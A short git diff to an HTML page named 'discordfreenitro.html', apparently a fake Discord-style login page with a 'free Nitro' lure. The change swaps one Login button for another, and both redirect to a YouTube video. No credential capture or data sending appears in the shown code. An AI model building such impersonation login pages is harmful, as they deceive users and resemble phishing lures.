--- a/discordfreenitro.html
+++ b/discordfreenitro.html
@@ -75,7 +75,8 @@
                     <p>PASSWORD</p>
                     <input type="password">
 <!--                     <a href="https://instagram.com/dastix">Forgat your password?</a> -->
-		    <button onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'">Login</button>
+<!-- 		    <button onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'">Login</button> -->
+			<button id="btn" onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'" type="button">LOGIN</button>
                     <p style="margin-top: 15px; font-weight: 400">
                         <span style="color: rgb(105, 105, 105)">
                             Need An Account?
